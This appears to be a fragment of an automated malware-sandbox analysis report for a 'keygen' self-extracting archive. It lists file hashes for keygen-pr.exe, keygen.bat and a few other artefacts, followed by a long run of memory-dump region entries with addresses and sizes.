                                                                                                                                                                                        T1102

                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                        Downloads

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                          MD5

                                                                                                                                                                                          173ab03ca3e965550b99b157451ece54

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          cc8a1b678c20b9845bc5f6631246b62097376be3

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          a8c0d8a9699799e9ea1678fbce7b3056d838494b2f3afd6e23276ddfe2a00feb

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          df34c62df36e9c6cd9b184c17cdbdc761492fb2ad873833fc532ba738a3ed23435a86e1de32bdf9d17e696ece9beff0fbb09716138b0293f986919d819a9e84c

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                          MD5

                                                                                                                                                                                          65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                          MD5

                                                                                                                                                                                          65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                                                          MD5

                                                                                                                                                                                          39f80c4d452a26def7a2d05f32a74e02

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          de6ef8e49e7725f627b1d748d7138c226bff75e1

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          f8d3c7043a3308cc1dedcf76bc0cd484df93822a7e3edddcab1595bb4959e582

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          97f6af2ca63a6784b9d63d996d68cec36b7eca8a39a85ea6ef3e3d540594944a7539266fec15fa4843ec1cd87d9523a723cedf00b6feaa5cc666b99ae67adf56

                                                                                                                                                                                        • \??\pipe\crashpad_1824_EKLDPKKYRTOABECO
                                                                                                                                                                                          MD5

                                                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                        • memory/216-271-0x0000014212FD0000-0x0000014213037000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/400-303-0x0000000004E10000-0x0000000005416000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          6.0MB

                                                                                                                                                                                        • memory/412-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/504-257-0x0000000000400000-0x0000000000983000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          5.5MB

                                                                                                                                                                                        • memory/732-248-0x000002B78FAE0000-0x000002B78FB24000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          272KB

                                                                                                                                                                                        • memory/732-249-0x000002B78FBA0000-0x000002B78FC07000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/760-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/948-275-0x000002607D100000-0x000002607D167000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/1008-307-0x0000024AF7780000-0x0000024AF77F2000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          456KB

                                                                                                                                                                                        • memory/1008-272-0x0000024AF7710000-0x0000024AF7777000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/1088-273-0x000001FFCE870000-0x000001FFCE8D7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/1200-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/1232-302-0x00000000051B0000-0x00000000051B1000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4KB

                                                                                                                                                                                        • memory/1256-265-0x000001C9FDB90000-0x000001C9FDBF7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/1296-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/1348-277-0x000001BD98200000-0x000001BD98267000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/1368-301-0x00000000058C0000-0x00000000058C1000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4KB

                                                                                                                                                                                        • memory/1436-260-0x0000029497B00000-0x0000029497B67000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/1528-292-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          3.5MB

                                                                                                                                                                                        • memory/1624-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/1868-276-0x00000223F2550000-0x00000223F25B7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/1972-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/2120-298-0x00000000052A0000-0x00000000052A1000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4KB

                                                                                                                                                                                        • memory/2164-294-0x0000016BF4B00000-0x0000016BF4C05000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1.0MB

                                                                                                                                                                                        • memory/2164-291-0x0000016BF2670000-0x0000016BF26E2000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          456KB

                                                                                                                                                                                        • memory/2164-290-0x0000016BF23A0000-0x0000016BF23EB000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          300KB

                                                                                                                                                                                        • memory/2248-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/2304-255-0x00000174F0280000-0x00000174F02E7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/2304-309-0x00000174F02F0000-0x00000174F0362000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          456KB

                                                                                                                                                                                        • memory/2340-262-0x000001B23FFB0000-0x000001B240017000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/2488-305-0x000001ED2C2B0000-0x000001ED2C322000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          456KB

                                                                                                                                                                                        • memory/2488-251-0x000001ED2C1D0000-0x000001ED2C237000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/2568-267-0x0000020869550000-0x00000208695B7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/2592-268-0x000001C46CD70000-0x000001C46CDD7000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          412KB

                                                                                                                                                                                        • memory/2608-297-0x0000000004EA0000-0x0000000004EA1000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4KB

                                                                                                                                                                                        • memory/2620-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/2620-124-0x00007FFC21A40000-0x00007FFC21A41000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4KB

                                                                                                                                                                                        • memory/2664-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/3192-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/3324-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/3388-135-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/3500-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/3796-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/3832-280-0x0000000000740000-0x00000000007D1000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          580KB

                                                                                                                                                                                        • memory/3832-281-0x0000000000400000-0x00000000004B3000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          716KB

                                                                                                                                                                                        • memory/3860-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/3896-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4100-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4112-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4116-165-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4124-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4128-299-0x0000000005560000-0x0000000005561000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4KB

                                                                                                                                                                                        • memory/4132-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4144-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4152-283-0x0000000000490000-0x000000000053E000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          696KB

                                                                                                                                                                                        • memory/4156-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4216-279-0x00000000047E0000-0x0000000004937000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1.3MB

                                                                                                                                                                                        • memory/4216-282-0x0000000010000000-0x000000001019E000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1.6MB

                                                                                                                                                                                        • memory/4224-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4260-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4260-293-0x00000142CC2E0000-0x00000142CC300000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          128KB

                                                                                                                                                                                        • memory/4260-295-0x00000142CC300000-0x00000142CC320000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          128KB

                                                                                                                                                                                        • memory/4260-288-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          7.0MB

                                                                                                                                                                                        • memory/4300-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4308-247-0x0000000002570000-0x000000000270C000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1.6MB

                                                                                                                                                                                        • memory/4308-289-0x0000000000BA0000-0x0000000000BBB000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          108KB

                                                                                                                                                                                        • memory/4308-286-0x0000000002E00000-0x0000000002EEF000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          956KB

                                                                                                                                                                                        • memory/4308-287-0x0000000000BB0000-0x0000000000BB1000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          4KB

                                                                                                                                                                                        • memory/4332-296-0x0000000002830000-0x0000000002832000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          8KB

                                                                                                                                                                                        • memory/4336-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4368-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4480-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4484-203-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4496-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4524-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4536-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4536-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4540-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4556-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4584-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4596-284-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          284KB

                                                                                                                                                                                        • memory/4664-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4676-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4676-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4728-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4732-300-0x00000000053D0000-0x00000000058CE000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          5.0MB

                                                                                                                                                                                        • memory/4752-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4760-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4780-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4784-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4784-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4832-269-0x0000000004A60000-0x0000000004AB6000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          344KB

                                                                                                                                                                                        • memory/4832-253-0x0000000003200000-0x000000000323A000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          232KB

                                                                                                                                                                                        • memory/4836-187-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4864-192-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4864-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4888-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4892-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4932-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4948-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4952-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4968-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4980-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/4984-285-0x00000000036E0000-0x0000000003727000-memory.dmp
                                                                                                                                                                                          Filesize

                                                                                                                                                                                          284KB

                                                                                                                                                                                        • memory/5000-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/5012-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/5028-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/5040-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/5068-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/5076-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/5088-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                        • memory/5096-218-0x0000000000000000-mapping.dmp